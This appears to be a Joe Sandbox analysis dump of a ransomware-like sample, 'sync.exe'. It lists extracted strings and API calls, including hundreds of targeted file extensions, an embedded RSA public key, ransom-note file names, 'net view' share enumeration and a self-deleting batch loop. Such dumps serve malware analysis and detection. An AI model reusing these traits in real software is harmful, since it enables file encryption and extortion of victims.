pptx, xrefs: 004029AF
sch, xrefs: 004036BF
pspimage, xrefs: 0040351D
jar, xrefs: 0040253B
wpd, xrefs: 00402D06
ram, xrefs: 004035C8
pat, xrefs: 00403485
dds, xrefs: 004022A2
wbmp, xrefs: 00403A29
cdx, xrefs: 0040215F
cdr, xrefs: 004020ED
ait, xrefs: 00402F53
bpw, xrefs: 004020C7
/c dir , xrefs: 00401D53
mbx, xrefs: 004025E6
ustar, xrefs: 004038F9
bay, xrefs: 00402068
sst, xrefs: 004037EF
8"9, xrefs: 00401642
qcow, xrefs: 004035A2
wad, xrefs: 004039F0
0n9, xrefs: 0040184E, 0040188A, 004018B5, 004018CC, 00401C6A, 00401C9D, 00401CC8, 00401CDF, 00401D1F
sitx, xrefs: 0040376A
Hn9, xrefs: 004018E0, 00401CF3
dbx, xrefs: 00402269
xsd, xrefs: 00403AFA
aes, xrefs: 00402F40
safe, xrefs: 00402A80
tbz, xrefs: 00403861
sd2, xrefs: 004036E5
arc, xrefs: 00402F79
vbs, xrefs: 0040391F
reg, xrefs: 00402DEA
swf, xrefs: 0040383B
ppz, xrefs: 004029C2
cdr4, xrefs: 00402113
mocha, xrefs: 0040267E
wax, xrefs: 00403A16
rtx, xrefs: 00403660
accdr, xrefs: 00401FAA
mny, xrefs: 004032AA
psafe3, xrefs: 0040350A
ppt, xrefs: 00402989
hwp, xrefs: 004024B6
pef, xrefs: 0040287F
snd, xrefs: 004037A3
moneywell, xrefs: 0040266B
vhdx, xrefs: 00403958
fla, xrefs: 00403141
%ld, xrefs: 00403DF2
pnm, xrefs: 004034D1
qbw, xrefs: 00402A21
gif, xrefs: 00402444
wdb, xrefs: 00402CF3
dwg, xrefs: 00402386
cdr3, xrefs: 00402100
dxb, xrefs: 00402399
sxg, xrefs: 00402BE9
xls, xrefs: 00402D3F
xlm, xrefs: 00402DC4
wb3, xrefs: 00402CCD
lbf, xrefs: 004031D9
rspt, xrefs: 00402DFD
dit, xrefs: 004022DB
wb1, xrefs: 00402CA7
doc, xrefs: 004022EE
stm, xrefs: 00402BB0
xlt, xrefs: 00402DD7
vdi, xrefs: 00403945
ogv, xrefs: 00403400
mvb, xrefs: 00403342
wps, xrefs: 00402D19
mpeg, xrefs: 004032E3
m2ts, xrefs: 0040325E
-----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO, xrefs: 00403D22
odm, xrefs: 0040274F
nml, xrefs: 004026B7
iiq, xrefs: 0040317A
dat, xrefs: 0040305D
odc, xrefs: 00402703
wsc, xrefs: 00403AAE
fdb, xrefs: 004023F8
wvx, xrefs: 00403AC1
mmw, xrefs: 00402645
html, xrefs: 004024A3
lua, xrefs: 004025AD
move /y readme.html ", xrefs: 004016C4
bz2, xrefs: 00403024
vcf, xrefs: 00402C81
rdb, xrefs: 00403627
sdc, xrefs: 00402ACC
dcs, xrefs: 0040228F
tar, xrefs: 0040384E
pcd, xrefs: 00402833
tlz, xrefs: 0040389A
nef, xrefs: 004026A4
\system volume information\, xrefs: 00401F4B
frm, xrefs: 00402431
package, xrefs: 0040345F
bgt, xrefs: 0040208E
accdb, xrefs: 00401F84
fhd, xrefs: 0040312E
sxw, xrefs: 00402C22
fff, xrefs: 0040311B
uot, xrefs: 004038D3
das, xrefs: 0040304A
ott, xrefs: 00402E5C
xlw, xrefs: 00402ECE
profile, xrefs: 00402E10
eml, xrefs: 004023D2
pcx, xrefs: 00402859
wav, xrefs: 00403A03
nrw, xrefs: 004026CA
vmxf, xrefs: 004039A4
cdrw, xrefs: 0040214C
config, xrefs: 004021BE
kwm, xrefs: 004031C6
nyf, xrefs: 004033C7
potx, xrefs: 00402917
qbr, xrefs: 0040357C
arw, xrefs: 00401FE3
zoo, xrefs: 00403B39
cmd /c net view, xrefs: 00401910
vmsd, xrefs: 0040397E
iwi, xrefs: 004031A0
xltm, xrefs: 00402EA8
qby, xrefs: 0040358F
db_journal, xrefs: 00403083
sxi, xrefs: 00402BFC
mml, xrefs: 00402632
laccdb, xrefs: 00402561
d3dbsp, xrefs: 00402256
rgb, xrefs: 0040363A
wp5, xrefs: 00403A88
tgz, xrefs: 00403887
raf, xrefs: 00402A5A
backupdb, xrefs: 0040202F
cmd /c net view , xrefs: 00401A74
ffd, xrefs: 00403108
xlc, xrefs: 00402D9E
vor, xrefs: 004039CA
xlr, xrefs: 00402D2C
ppm, xrefs: 0040293D
xlsb, xrefs: 00402D52
indd, xrefs: 0040318D
vob, xrefs: 004039B7
Disk, xrefs: 00401B04
upk, xrefs: 004038E6
class, xrefs: 00402198
vmx, xrefs: 00403991
program files (x86)\, xrefs: 00401ED2
myi, xrefs: 00403368
otg, xrefs: 0040279B
ser, xrefs: 004036F8
css, xrefs: 00402230
pages, xrefs: 00403472
dotx, xrefs: 0040234D
pab, xrefs: 0040280D
cdr6, xrefs: 00402139
pfr, xrefs: 004034BE
oth, xrefs: 004027AE
awg, xrefs: 00402FC5
odb, xrefs: 004026F0
ots, xrefs: 004027D4
ndf, xrefs: 0040337B
back, xrefs: 00402FD8
psd, xrefs: 004029E8
cer, xrefs: 00402172
KEY, xrefs: 00403FAF
scd, xrefs: 004036AC
readme.png", xrefs: 0040170C
.kk, xrefs: 0040415E, 00404372
edb, xrefs: 004023BF
skm, xrefs: 0040377D
craw, xrefs: 004021F7
qcow2, xrefs: 004035B5
windows\, xrefs: 00401EB0
wb2, xrefs: 00402CBA
pntg, xrefs: 004028F1
sxc, xrefs: 00402BD6
spl, xrefs: 004037B6
vmdk, xrefs: 0040396B
ach, xrefs: 00401FD0
pdf, xrefs: 0040286C
txz, xrefs: 004038AD
ppsm, xrefs: 00402963
asc, xrefs: 00402F8C
backup, xrefs: 0040201C
readme.html" && exit, xrefs: 0040442B
rat, xrefs: 00403601
pct, xrefs: 00402846
move /y readme.png ", xrefs: 004016FD
lzx, xrefs: 0040324B
der, xrefs: 004022B5
p7s, xrefs: 0040344C
hdd, xrefs: 00403B4C
ptx, xrefs: 004029FB
pls, xrefs: 00402E6F
design, xrefs: 004030CF
tmp.bat, xrefs: 0040451E
cfg, xrefs: 00402185
csv, xrefs: 00402243
csh, xrefs: 00403037
qpw, xrefs: 00402A47
pdd, xrefs: 004034AB
bmp, xrefs: 004020B4
accde, xrefs: 00401F97
blend, xrefs: 004020A1
skp, xrefs: 00402B18
xlam, xrefs: 00402D8B
rwl, xrefs: 00403686
otp, xrefs: 004027C1
wcm, xrefs: 00402CE0
vhd, xrefs: 00402F2D
gpg, xrefs: 00402457
odi, xrefs: 0040273C
xpm, xrefs: 00403AD4
vcd, xrefs: 00403932
drw, xrefs: 00402373
qbx, xrefs: 00402A34
cls, xrefs: 004021AB
vbox, xrefs: 0040390C
\$recycle.bin\, xrefs: 00401F71
hpp, xrefs: 00402490
mpa, xrefs: 004032BD
dxf, xrefs: 004023AC
smf, xrefs: 00403790
wks, xrefs: 00403A62
lzma, xrefs: 00403225
nvram, xrefs: 004033A1
start cmd /c ", xrefs: 00404419, 0040445C
pwm, xrefs: 00403530
<, xrefs: 00401DD5
jpg, xrefs: 004024EF
mid, xrefs: 00403297
/s /b /a-d >> , xrefs: 00401D8E
7zip, xrefs: 00402F1A
rwz, xrefs: 00403699
txt, xrefs: 00402C48
Hn9, xrefs: 004017D9, 00401830, 00401849, 00401896, 004018D2, 00401BEC, 00401C3E, 00401C5D, 00401CA9, 00401CE5, 00401D2B
wallet, xrefs: 00402C94
sxm, xrefs: 00402C0F
mpga, xrefs: 00403309
raw, xrefs: 00403614
odp, xrefs: 00402762
mrw, xrefs: 0040331C
cmd.exe, xrefs: 00401DE9
webm, xrefs: 00403A3C
key, xrefs: 00402528
flf, xrefs: 0040240B
svg, xrefs: 00403815
dbf, xrefs: 00403070
eps, xrefs: 004023E5
kdbx, xrefs: 00402502
docx, xrefs: 00402314
p12, xrefs: 004027E7
pps, xrefs: 00402950
pem, xrefs: 00402892
shar, xrefs: 0040371E
litesql, xrefs: 004031EC
pptm, xrefs: 0040299C
sda, xrefs: 00402AB9
sti, xrefs: 00402B9D
ddoc, xrefs: 004030A9
svi, xrefs: 00403828
asm, xrefs: 00402F9F
mpp, xrefs: 00402691
potm, xrefs: 00402904
pot, xrefs: 004034E4
dot, xrefs: 00402327
dif, xrefs: 004022C8
bak, xrefs: 00402042
p7r, xrefs: 00403439
\, xrefs: 00401E48
jnt, xrefs: 004031B3
jpe, xrefs: 004024C9
apk, xrefs: 00402F66
uop, xrefs: 004038C0
midi, xrefs: 00402658
hbk, xrefs: 0040247D
sqlite3, xrefs: 00402B51
sqlite, xrefs: 00402B3E
jpeg, xrefs: 004024DC
erbsql, xrefs: 004030E2
docm, xrefs: 00402301
Xn9, xrefs: 00401678, 0040169B, 004016BC, 004016F5, 00403F9A, 00404006, 00404411, 00404454
contact, xrefs: 004021D1
mdb, xrefs: 004025F9
pbm, xrefs: 00402820
java, xrefs: 0040254E
pas, xrefs: 004027FA
rar, xrefs: 004035DB
crt, xrefs: 0040220A
readme.html", xrefs: 004016D3
lzo, xrefs: 00403238
rjs, xrefs: 0040364D
wri, xrefs: 00403A9B
tbz2, xrefs: 00403874
latex, xrefs: 00402574
kdc, xrefs: 00402515
xlsx, xrefs: 00402D78
scm, xrefs: 004036D2
wab, xrefs: 004039DD
asset, xrefs: 00402FB2
ras, xrefs: 004035EE
sav, xrefs: 00402A93
\desktop\readme\, xrefs: 00401F5E
pdb, xrefs: 00403498
ppam, xrefs: 0040292A
mpg, xrefs: 004032F6
myd, xrefs: 00403355
aspx, xrefs: 00402009
xlk, xrefs: 00402DB1
xlsm, xrefs: 00402D65
p7m, xrefs: 00403426
mpe, xrefs: 004032D0
cdf, xrefs: 004020DA
erf, xrefs: 004030F5
shw, xrefs: 00403731
pict, xrefs: 004028DE
djvu, xrefs: 00402E36
mfw, xrefs: 0040260C
tif, xrefs: 00402C5B
nsh, xrefs: 0040338E
tiff, xrefs: 00402C6E
0, xrefs: 00404516
0.100, xrefs: 00404059
bkp, xrefs: 00402FEB
programdata\, xrefs: 00401F16
dotm, xrefs: 0040233A
ssm, xrefs: 004037DC
qba, xrefs: 00403543
sdf, xrefs: 00402AF2
ogg, xrefs: 004033ED
webp, xrefs: 00403A4F
winnt\, xrefs: 00401F38
pub, xrefs: 00402A0E
r00, xrefs: 00402EF4
flac, xrefs: 00403154
stc, xrefs: 00402B77
ms11, xrefs: 00402E49
cpp, xrefs: 004021E4
bat, xrefs: 00402055
sdp, xrefs: 00402B05
php, xrefs: 004028CB
pst, xrefs: 00402E95
max, xrefs: 004025D3
bsa, xrefs: 00403011
save, xrefs: 00402AA6
sdd, xrefs: 00402ADF
p7b, xrefs: 00403413
odf, xrefs: 00402716
tex, xrefs: 00402C35
zip, xrefs: 00403B20
qbm, xrefs: 00403569
rtf, xrefs: 00402A6D
xps, xrefs: 00403AE7
brd, xrefs: 00402FFE
ppsx, xrefs: 00402976
drf, xrefs: 00402360
odg, xrefs: 00402729
stw, xrefs: 00402BC3
bdb, xrefs: 0040207B
sqlitedb, xrefs: 00402B64
xltx, xrefs: 00402EBB
xml, xrefs: 00402EE1
sid, xrefs: 00403744
\README\, xrefs: 0040166B
AMMOUNT.txt, xrefs: 00404015
fpx, xrefs: 0040241E
m4a, xrefs: 00403271
rvt, xrefs: 00403673
iif, xrefs: 00403167
gry, xrefs: 0040246A
srw, xrefs: 004037C9
png, xrefs: 00402E82
adp, xrefs: 00401FBD
djv, xrefs: 00402E23
ods, xrefs: 00402775
@, xrefs: 00401DDF
cdr5, xrefs: 00402126
ddd, xrefs: 00403096
sit, xrefs: 00403757
pgm, xrefs: 004028B8
stx, xrefs: 00403802
BTC, xrefs: 00404074
pfx, xrefs: 004028A5
lit, xrefs: 0040259A

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 00401630, Relevance: 783.2, APIs: 40, Strings: 406, Instructions: 2747

APIs

Part of subcall function 00551D50: strlen.MSVCRT ref: 00551D5E

CreateDirectoryA.KERNELBASE(00000000,00000001,?,?,?,0CA30061,00000001,?,005715BA,?,00000000), ref: 004016A3
Sleep.KERNELBASE(00000000,00000000,?,005715BA,?,00000000), ref: 004016B2

Part of subcall function 0056E030: strlen.MSVCRT ref: 0056E045

system.MSVCRT ref: 00401745
system.MSVCRT ref: 00401765
GetLogicalDriveStringsA.KERNEL32(00000000,00000000), ref: 00401782

Part of subcall function 00404A24: Sleep.KERNELBASE(005715BA), ref: 00404A35
Part of subcall function 00404A24: time.MSVCRT ref: 00404A43
Part of subcall function 00404A24: srand.MSVCRT ref: 00404A4B
Part of subcall function 00404A24: rand.MSVCRT ref: 00404A62

GetDriveTypeA.KERNELBASE ref: 004017B5

Part of subcall function 00570390: malloc.MSVCRT ref: 005703A5
Part of subcall function 00570390: malloc.MSVCRT ref: 00570406

lstrlenA.KERNEL32(00000000,?,?,?), ref: 004018F4

Part of subcall function 00404972: _popen.MSVCRT ref: 0040499B
Part of subcall function 00404972: feof.MSVCRT ref: 004049D7
Part of subcall function 00404972: fgets.MSVCRT ref: 004049F5

Part of subcall function 0056AE60: memchr.MSVCRT ref: 0056AFCB

Part of subcall function 004F3DD0: strlen.MSVCRT ref: 004F3DDE

ShellExecuteEx.SHELL32 ref: 00401DFC
WaitForSingleObject.KERNEL32 ref: 00401E14
GetSystemWindowsDirectoryA.KERNEL32(?), ref: 00401E38
tolower.MSVCRT ref: 00401E90
tolower.MSVCRT ref: 00403C63

Part of subcall function 004048E5: memcmp.MSVCRT ref: 0040490B

remove.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00403D4B
time.MSVCRT ref: 00403DB5
srand.MSVCRT ref: 00403DDC
rand.MSVCRT ref: 00403DE1

Part of subcall function 004053C0: strlen.MSVCRT ref: 00405407

malloc.MSVCRT ref: 00403F67
fopen.MSVCRT ref: 00403FCD
fwrite.MSVCRT ref: 00403FF1
fclose.MSVCRT ref: 00403FFF

Part of subcall function 0056D960: strlen.MSVCRT ref: 0056D974

system.MSVCRT ref: 004044C7

Part of subcall function 004F4630: strlen.MSVCRT ref: 004F4643
Part of subcall function 004F4630: memcmp.MSVCRT ref: 004F4662

fopen.MSVCRT ref: 00404136
fopen.MSVCRT ref: 0040417C
malloc.MSVCRT ref: 004041BE
malloc.MSVCRT ref: 0040420E
fwrite.MSVCRT ref: 00404232
fread.MSVCRT ref: 0040425C
fwrite.MSVCRT ref: 004042BB
fwrite.MSVCRT ref: 0040431C
free.MSVCRT(00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00404324
free.MSVCRT(00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00404332
fclose.MSVCRT ref: 00404346
fclose.MSVCRT ref: 00404354
remove.MSVCRT(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00404398
_chmod.MSVCRT ref: 004043B0
remove.MSVCRT(?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 004043C0
remove.MSVCRT(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 004043D0
remove.MSVCRT(?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
system.MSVCRT ref: 004044A7
system.MSVCRT ref: 0040456B

Part of subcall function 004F3C90: strlen.MSVCRT ref: 004F3C9E

Part of subcall function 004F4240: strlen.MSVCRT ref: 004F424E

Strings

bat, xrefs: 00402055
cmd.exe, xrefs: 00401DE9
accdb, xrefs: 00401F84
cls, xrefs: 004021AB
ppt, xrefs: 00402989
csh, xrefs: 00403037
\system volume information\, xrefs: 00401F4B
vdi, xrefs: 00403945
scd, xrefs: 004036AC
start cmd /c ", xrefs: 00404419, 0040445C
vbs, xrefs: 0040391F
sdf, xrefs: 00402AF2
dotm, xrefs: 0040233A
pgm, xrefs: 004028B8
p7r, xrefs: 00403439
program files\, xrefs: 00401EF4
/s /b /a-d >> , xrefs: 00401D8E
ppsx, xrefs: 00402976
mvb, xrefs: 00403342
r00, xrefs: 00402EF4
pab, xrefs: 0040280D
:Repeatdel "sync.exe"if exist "sync.exe" goto Repeatexit, xrefs: 00404538
ldf, xrefs: 00402587
lzh, xrefs: 00403212
mpa, xrefs: 004032BD
save, xrefs: 00402AA6
tbz, xrefs: 00403861
cfg, xrefs: 00402185
cer, xrefs: 00402172
start tmp.bat, xrefs: 00404555
pat, xrefs: 00403485
kdbx, xrefs: 00402502
mbx, xrefs: 004025E6
mid, xrefs: 00403297
otg, xrefs: 0040279B
php, xrefs: 004028CB
jpeg, xrefs: 004024DC
xlam, xrefs: 00402D8B
cdrw, xrefs: 0040214C
\$recycle.bin\, xrefs: 00401F71
ndf, xrefs: 0040337B
apk, xrefs: 00402F66
vcf, xrefs: 00402C81
sav, xrefs: 00402A93
qbr, xrefs: 0040357C
cdx, xrefs: 0040215F
dot, xrefs: 00402327
mny, xrefs: 004032AA
sxc, xrefs: 00402BD6
pem, xrefs: 00402892
iiq, xrefs: 0040317A
uop, xrefs: 004038C0
vbox, xrefs: 0040390C
xsd, xrefs: 00403AFA
qpw, xrefs: 00402A47
\desktop\readme\, xrefs: 00401F5E
potx, xrefs: 00402917
safe, xrefs: 00402A80
dcs, xrefs: 0040228F
config, xrefs: 004021BE
pbm, xrefs: 00402820
accde, xrefs: 00401F97
lzx, xrefs: 0040324B
programdata\, xrefs: 00401F16
wpd, xrefs: 00402D06
docx, xrefs: 00402314
rat, xrefs: 00403601
rvt, xrefs: 00403673
ppam, xrefs: 0040292A
xlt, xrefs: 00402DD7
nsh, xrefs: 0040338E
ait, xrefs: 00402F53
pot, xrefs: 004034E4
qcow, xrefs: 004035A2
db_journal, xrefs: 00403083
xlk, xrefs: 00402DB1
vob, xrefs: 004039B7
hbk, xrefs: 0040247D
hwp, xrefs: 004024B6
fla, xrefs: 00403141
KEY, xrefs: 00403FAF
litesql, xrefs: 004031EC
sdc, xrefs: 00402ACC
wb3, xrefs: 00402CCD
wcm, xrefs: 00402CE0
sxi, xrefs: 00402BFC
craw, xrefs: 004021F7
winnt\, xrefs: 00401F38
des, xrefs: 004030BC
uot, xrefs: 004038D3
sqlitedb, xrefs: 00402B64
qba, xrefs: 00403543
bz2, xrefs: 00403024
eml, xrefs: 004023D2
erbsql, xrefs: 004030E2
0, xrefs: 00404516
sxg, xrefs: 00402BE9
pages, xrefs: 00403472
scm, xrefs: 004036D2
latex, xrefs: 00402574
wbmp, xrefs: 00403A29
ach, xrefs: 00401FD0
pict, xrefs: 004028DE
png, xrefs: 00402E82
jnt, xrefs: 004031B3
asset, xrefs: 00402FB2
doc, xrefs: 004022EE
ods, xrefs: 00402775
asm, xrefs: 00402F9F
java, xrefs: 0040254E
iwi, xrefs: 004031A0
hpp, xrefs: 00402490
flac, xrefs: 00403154
xlsb, xrefs: 00402D52
snd, xrefs: 004037A3
pspimage, xrefs: 0040351D
-----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO, xrefs: 00403D22
nef, xrefs: 004026A4
blend, xrefs: 004020A1
tif, xrefs: 00402C5B
mml, xrefs: 00402632
erf, xrefs: 004030F5
indd, xrefs: 0040318D
tmp.bat, xrefs: 0040451E
iif, xrefs: 00403167
sch, xrefs: 004036BF
<, xrefs: 00401DD5
ms11, xrefs: 00402E49
cmd /c net view, xrefs: 00401910
nyf, xrefs: 004033C7
tiff, xrefs: 00402C6E
kwm, xrefs: 004031C6
dbx, xrefs: 00402269
cdr4, xrefs: 00402113
cdf, xrefs: 004020DA
oth, xrefs: 004027AE
max, xrefs: 004025D3
stw, xrefs: 00402BC3
shar, xrefs: 0040371E
bay, xrefs: 00402068
mdb, xrefs: 004025F9
pct, xrefs: 00402846
dxf, xrefs: 004023AC
moneywell, xrefs: 0040266B
pas, xrefs: 004027FA
nrw, xrefs: 004026CA
xpm, xrefs: 00403AD4
ots, xrefs: 004027D4
midi, xrefs: 00402658
backup, xrefs: 0040201C
lzma, xrefs: 00403225
pls, xrefs: 00402E6F
drw, xrefs: 00402373
sti, xrefs: 00402B9D
bkp, xrefs: 00402FEB
dat, xrefs: 0040305D
readme.png" && exit, xrefs: 0040446E
fhd, xrefs: 0040312E
vhd, xrefs: 00402F2D
adp, xrefs: 00401FBD
xml, xrefs: 00402EE1
pps, xrefs: 00402950
@, xrefs: 00401DDF
lua, xrefs: 004025AD
AMMOUNT.txt, xrefs: 00404015
odi, xrefs: 0040273C
vmxf, xrefs: 004039A4
tgz, xrefs: 00403887
m4a, xrefs: 00403271
m2ts, xrefs: 0040325E
.kk, xrefs: 0040415E, 00404372
backupdb, xrefs: 0040202F
webp, xrefs: 00403A4F
bdb, xrefs: 0040207B
ptx, xrefs: 004029FB
wsc, xrefs: 00403AAE
csv, xrefs: 00402243
jpe, xrefs: 004024C9
windows\, xrefs: 00401EB0
sit, xrefs: 00403757
bsa, xrefs: 00403011
cdr6, xrefs: 00402139
sql, xrefs: 00402B2B
odc, xrefs: 00402703
pef, xrefs: 0040287F
cpp, xrefs: 004021E4
mpp, xrefs: 00402691
awg, xrefs: 00402FC5
cmd /c net view , xrefs: 00401A74
nvram, xrefs: 004033A1
myi, xrefs: 00403368
swf, xrefs: 0040383B
docm, xrefs: 00402301
aspx, xrefs: 00402009
xlc, xrefs: 00402D9E
lit, xrefs: 0040259A
pub, xrefs: 00402A0E
rwz, xrefs: 00403699
class, xrefs: 00402198
tex, xrefs: 00402C35
readme.html" && exit, xrefs: 0040442B
odb, xrefs: 004026F0
dotx, xrefs: 0040234D
mocha, xrefs: 0040267E
rdb, xrefs: 00403627
stm, xrefs: 00402BB0
mlb, xrefs: 0040261F
jpg, xrefs: 004024EF
ser, xrefs: 004036F8
edb, xrefs: 004023BF
nml, xrefs: 004026B7
ram, xrefs: 004035C8
ogg, xrefs: 004033ED
pdf, xrefs: 0040286C
odf, xrefs: 00402716
vor, xrefs: 004039CA
pfx, xrefs: 004028A5
dcr, xrefs: 0040227C
contact, xrefs: 004021D1
7zip, xrefs: 00402F1A
ppm, xrefs: 0040293D
arw, xrefs: 00401FE3
ppz, xrefs: 004029C2
wma, xrefs: 00403A75
obj, xrefs: 004033DA
djvu, xrefs: 00402E36
der, xrefs: 004022B5
wb2, xrefs: 00402CBA
mapimail, xrefs: 004025C0
wad, xrefs: 004039F0
wvx, xrefs: 00403AC1
mrw, xrefs: 0040331C
sqlite, xrefs: 00402B3E
pcx, xrefs: 00402859
ssm, xrefs: 004037DC
sd2, xrefs: 004036E5
mfw, xrefs: 0040260C
sxm, xrefs: 00402C0F
move /y readme.png ", xrefs: 004016FD
myd, xrefs: 00403355
drf, xrefs: 00402360
wb1, xrefs: 00402CA7
profile, xrefs: 00402E10
skm, xrefs: 0040377D
asc, xrefs: 00402F8C
arc, xrefs: 00402F79
design, xrefs: 004030CF
crt, xrefs: 0040220A
reg, xrefs: 00402DEA
p7m, xrefs: 00403426
d3dbsp, xrefs: 00402256
wks, xrefs: 00403A62
ustar, xrefs: 004038F9
rtx, xrefs: 00403660
fff, xrefs: 0040311B
nxl, xrefs: 004033B4
xlr, xrefs: 00402D2C
mpga, xrefs: 00403309
txt, xrefs: 00402C48
pptx, xrefs: 004029AF
Disk, xrefs: 00401B04
sdp, xrefs: 00402B05
lbf, xrefs: 004031D9
vmx, xrefs: 00403991
stx, xrefs: 00403802
xltx, xrefs: 00402EBB
djv, xrefs: 00402E23
qbw, xrefs: 00402A21
skp, xrefs: 00402B18
program files (x86)\, xrefs: 00401ED2
pntg, xrefs: 004028F1
readme.html", xrefs: 004016D3
vhdx, xrefs: 00403958
brd, xrefs: 00402FFE
css, xrefs: 00402230
pnm, xrefs: 004034D1
xlsm, xrefs: 00402D65
rar, xrefs: 004035DB
tlz, xrefs: 0040389A
\, xrefs: 00401E48
sst, xrefs: 004037EF
ddd, xrefs: 00403096
sqlite3, xrefs: 00402B51
vmsd, xrefs: 0040397E
xps, xrefs: 00403AE7
move /y readme.html ", xrefs: 004016C4
vmdk, xrefs: 0040396B
p7s, xrefs: 0040344C
gry, xrefs: 0040246A
mpg, xrefs: 004032F6
zip, xrefs: 00403B20
ddoc, xrefs: 004030A9
ffd, xrefs: 00403108
msg, xrefs: 0040332F
ott, xrefs: 00402E5C
pst, xrefs: 00402E95
smf, xrefs: 00403790
otp, xrefs: 004027C1
0.100, xrefs: 00404059
bpw, xrefs: 004020C7
vcd, xrefs: 00403932
odt, xrefs: 00402788
html, xrefs: 004024A3
package, xrefs: 0040345F
\README\, xrefs: 0040166B
sxw, xrefs: 00402C22
sitx, xrefs: 0040376A
svg, xrefs: 00403815
upk, xrefs: 004038E6
oab, xrefs: 004026DD
pwm, xrefs: 00403530
das, xrefs: 0040304A
raf, xrefs: 00402A5A
frm, xrefs: 00402431
mpe, xrefs: 004032D0
sid, xrefs: 00403744
jar, xrefs: 0040253B
pptm, xrefs: 0040299C
p7b, xrefs: 00403413
accdr, xrefs: 00401FAA
eps, xrefs: 004023E5
dif, xrefs: 004022C8
wps, xrefs: 00402D19
laccdb, xrefs: 00402561
readme.png", xrefs: 0040170C
odm, xrefs: 0040274F
sdd, xrefs: 00402ADF
prf, xrefs: 004029D5
rspt, xrefs: 00402DFD
bmp, xrefs: 004020B4
xlsx, xrefs: 00402D78
srw, xrefs: 004037C9
flf, xrefs: 0040240B
dds, xrefs: 004022A2
hdd, xrefs: 00403B4C
gpg, xrefs: 00402457
qbb, xrefs: 00403556
stc, xrefs: 00402B77
cdr, xrefs: 004020ED
bgt, xrefs: 0040208E
tbz2, xrefs: 00403874
tar, xrefs: 0040384E
bak, xrefs: 00402042
mpeg, xrefs: 004032E3
odp, xrefs: 00402762
qbx, xrefs: 00402A34
fpx, xrefs: 0040241E
rjs, xrefs: 0040364D
dxb, xrefs: 00402399
svi, xrefs: 00403828
wallet, xrefs: 00402C94
ras, xrefs: 004035EE
zoo, xrefs: 00403B39
wav, xrefs: 00403A03
back, xrefs: 00402FD8
key, xrefs: 00402528
psd, xrefs: 004029E8
sda, xrefs: 00402AB9
crw, xrefs: 0040221D
pdb, xrefs: 00403498
xls, xrefs: 00402D3F
odg, xrefs: 00402729
mmw, xrefs: 00402645
ogv, xrefs: 00403400
cdr3, xrefs: 00402100
ppsm, xrefs: 00402963
wp5, xrefs: 00403A88
qby, xrefs: 0040358F
shw, xrefs: 00403731
wab, xrefs: 004039DD
spl, xrefs: 004037B6
rtf, xrefs: 00402A6D
qbm, xrefs: 00403569
dbf, xrefs: 00403070
aes, xrefs: 00402F40
gif, xrefs: 00402444
xlw, xrefs: 00402ECE
wdb, xrefs: 00402CF3
psafe3, xrefs: 0040350A
p12, xrefs: 004027E7
txz, xrefs: 004038AD
kdc, xrefs: 00402515
asp, xrefs: 00401FF6
raw, xrefs: 00403614
xltm, xrefs: 00402EA8
pcd, xrefs: 00402833
pdd, xrefs: 004034AB
wax, xrefs: 00403A16
rwl, xrefs: 00403686
potm, xrefs: 00402904
%ld, xrefs: 00403DF2
/c dir , xrefs: 00401D53
std, xrefs: 00402B8A
wri, xrefs: 00403A9B
pfr, xrefs: 004034BE
cdr5, xrefs: 00402126
lzo, xrefs: 00403238
BTC, xrefs: 00404074
qcow2, xrefs: 004035B5
dit, xrefs: 004022DB
webm, xrefs: 00403A3C
rgb, xrefs: 0040363A
fdb, xrefs: 004023F8
xlm, xrefs: 00402DC4
dwg, xrefs: 00402386
mdf, xrefs: 00403284

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00401170, Relevance: 18.2, APIs: 12, Instructions: 202

APIs

Sleep.KERNEL32 ref: 00401204

Part of subcall function 004D1C30: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004D1DCB
Part of subcall function 004D1C30: VirtualProtect.KERNEL32 ref: 004D1DFC
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1F38
Part of subcall function 004D1C30: signal.MSVCRT ref: 004D1F9F
